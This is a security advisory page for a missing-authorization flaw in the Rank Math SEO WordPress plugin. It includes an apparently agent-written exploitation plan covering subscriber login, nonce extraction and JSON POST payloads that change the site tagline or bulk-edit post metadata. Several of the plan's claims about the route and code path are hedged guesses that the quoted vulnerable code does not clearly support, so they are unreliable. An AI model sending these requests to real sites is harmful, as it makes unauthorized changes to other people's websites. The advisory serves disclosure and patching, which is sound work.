Rank Math SEO – AI SEO Tools to Dominate SEO Rankings <= 1.0.271 - Missing Authorization
Description
The Rank Math SEO – AI SEO Tools to Dominate SEO Rankings plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in versions up to, and including, 1.0.271. This makes it possible for authenticated attackers, with subscriber-level access and above, to perform an unauthorized action.
CVSS Vector Breakdown
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:NTechnical Details
<=1.0.271What Changed in the Fix
Changes introduced in v1.0.271.1
Source Code
WordPress.org SVN# Exploitation Research Plan: CVE-2026-34892 (Rank Math SEO) ## 1. Vulnerability Summary The **Rank Math SEO** plugin for WordPress (versions <= 1.0.271) contains a **Missing Authorization** vulnerability within its "SEO Analysis" ability framework. The plugin introduces "Abilities" (as seen in `ve…
Show full research plan
Exploitation Research Plan: CVE-2026-34892 (Rank Math SEO)
1. Vulnerability Summary
The Rank Math SEO plugin for WordPress (versions <= 1.0.271) contains a Missing Authorization vulnerability within its "SEO Analysis" ability framework. The plugin introduces "Abilities" (as seen in vendor/composer/autoload_static.php) intended for auditing and fixing SEO issues. Specifically, the functionality tied to the RankMath\Abilities\SEO_Analysis\Fix_Site_SEO class fails to implement sufficient capability checks.
This allows an authenticated user with minimal privileges (Subscriber level) to trigger site-wide "fixes" that modify critical WordPress options (like the site tagline) or bulk-modify post metadata, actions that should be restricted to administrators.
2. Attack Vector Analysis
- Endpoint: WordPress REST API
- Route:
/wp-json/rankmath/v1/fix-site-seo(derived fromRest_Helper::BASEandlanguages/rank-math.potfunction titles) - HTTP Method:
POST - Authentication: Authenticated (Subscriber level and above)
- Vulnerable Parameter:
test_id(determines which fix to run),value(payload for specific fixes) - Required Headers:
X-WP-Nonce(standard WordPress REST API nonce)
3. Code Flow
- Entry Point: The REST API router receives a request to
rankmath/v1/fix-site-seo. - Dispatch: The request is routed to a handler likely associated with
RankMath\Abilities\SEO_Analysis\Fix_Site_SEO(registered inincludes/abilities/seo-analysis/class-fix-site-seo.php). - Missing Check: The
permission_callbackfor this route either uses__return_true, checks onlyis_user_logged_in(), or relies on aRest_Helpercheck that does not adequately verify therank_math_site_analysisormanage_optionscapability for this specific action. - Sink: The
Fix_Site_SEO::run()method (or equivalent) executes logic based on thetest_id.- If
test_idissite_description, it callsupdate_option( 'blogdescription', $request->get_param( 'value' ) )(as indicated by the POT string: "Site tagline updated to: "%s"."). - If
test_idisfocus_keywords, it bulk updates post meta across the site.
- If
4. Nonce Acquisition Strategy
WordPress REST API endpoints require a wp_rest nonce. Since the vulnerability requires Subscriber authentication, we can obtain this nonce from the WordPress admin dashboard.
- Login: Authenticate as a Subscriber user via the standard login flow.
- Navigate: Navigate to the WordPress Dashboard (
/wp-admin/index.php). - Extract: The
wp-adminarea enqueues thewp-apiscript which localizes the nonce in thewpApiSettingsobject. - Action: Use
browser_evalto extract the nonce:window.wpApiSettings?.nonce
5. Exploitation Strategy
We will attempt to change the site's tagline (blogdescription), which is a site-wide configuration change normally requiring manage_options.
Step 1: Obtain the Nonce
Action: Navigate to the dashboard as a Subscriber and extract the nonce.
- Tool:
browser_navigateto/wp-admin/ - Tool:
browser_evalto getwindow.wpApiSettings.nonce
Step 2: Perform the Unauthorized Action
Action: Send a POST request to the Rank Math REST endpoint to change the site tagline.
- URL:
http://[target]/wp-json/rankmath/v1/fix-site-seo - Method:
POST - Headers:
Content-Type: application/jsonX-WP-Nonce: [EXTRACTED_NONCE]
- Payload (JSON):
{ "test_id": "site_description", "value": "Vulnerable Site Tagline - Exploited by Subscriber" }
6. Test Data Setup
- Install Plugin: Install Rank Math SEO version 1.0.271.
- User Creation:
wp user create attacker attacker@example.com --role=subscriber --user_pass=password123 - Initial State: Note the current tagline.
wp option get blogdescription
7. Expected Results
- Response Code:
200 OK - Response Body: A JSON object containing a success message, such as:
{"message": "Site tagline updated to: \"Vulnerable Site Tagline - Exploited by Subscriber\"."} - Side Effect: The WordPress site tagline is modified globally.
8. Verification Steps
After the HTTP request, verify the change using WP-CLI:
wp option get blogdescription
# Expected output: Vulnerable Site Tagline - Exploited by Subscriber
9. Alternative Approaches
If the site_description fix is restricted, attempt a bulk metadata modification which is also handled by this ability:
Payload (Bulk Focus Keywords):
{
"test_id": "focus_keywords",
"post_limit": 500
}
- Expected Result: The plugin will derive and set focus keywords for up to 500 posts, which is an unauthorized modification of site content. Verify via:
wp post list --field=ID | xargs -I % wp post meta get % rank_math_focus_keyword
Summary
Rank Math SEO (versions <= 1.0.271) contains a missing authorization vulnerability in its REST API functionality. Authenticated users with low-level privileges (like Subscribers) can trigger site-wide 'SEO fixes' that should be restricted to administrators, allowing them to modify the site's tagline or bulk-update post metadata.
Vulnerable Code
// includes/rest/class-rest-helper.php @ 1.0.271 /** * Checks whether a given request has permission to read post. * * @param WP_REST_Request $request Full details about the request. * * @return true|WP_Error True if the request has read access, WP_Error object otherwise. */ public static function get_post_permissions_check( $request ) { $object_id = $request->get_param( 'objectID' ); if ( $object_id === 0 ) { return true; } $post = self::get_post( $object_id );
Security Fix
@@ -104,7 +104,15 @@ public static function get_post_permissions_check( $request ) { $object_id = $request->get_param( 'objectID' ); if ( $object_id === 0 ) { - return true; + if ( ! Helper::has_cap( 'titles' ) ) { + return new WP_Error( + 'rest_cannot_edit', + __( 'Sorry, you are not allowed to edit homepage SEO settings.', 'seo-by-rank-math' ), + [ 'status' => rest_authorization_required_code() ] + ); + } + return true; } $post = self::get_post( $object_id );
Exploit Outline
The vulnerability is exploited via the WordPress REST API by an authenticated user with at least Subscriber-level privileges. 1. **Authentication & Nonce Collection:** An attacker logs in as a Subscriber and extracts the `wp_rest` nonce from the `wpApiSettings` object available in the WordPress dashboard source code. 2. **Targeting the Endpoint:** The attacker sends a POST request to `/wp-json/rankmath/v1/fix-site-seo`. 3. **Payload Construction:** The payload targets a specific 'SEO test' to fix. For example, to change the site's tagline, the attacker uses `{"test_id": "site_description", "value": "Target Tagline"}`. To bulk-modify post metadata, the `test_id` can be set to `focus_keywords` with a `post_limit` parameter. 4. **Authorization Bypass:** Because the permission callback (likely utilizing the vulnerable `get_post_permissions_check` or a similar logic error in the SEO Analysis ability) fails to verify administrative capabilities (like `manage_options`), the plugin executes the setting update or bulk modification immediately.
Check if your site is affected.
Run a free security audit to detect vulnerable plugins, outdated versions, and misconfigurations.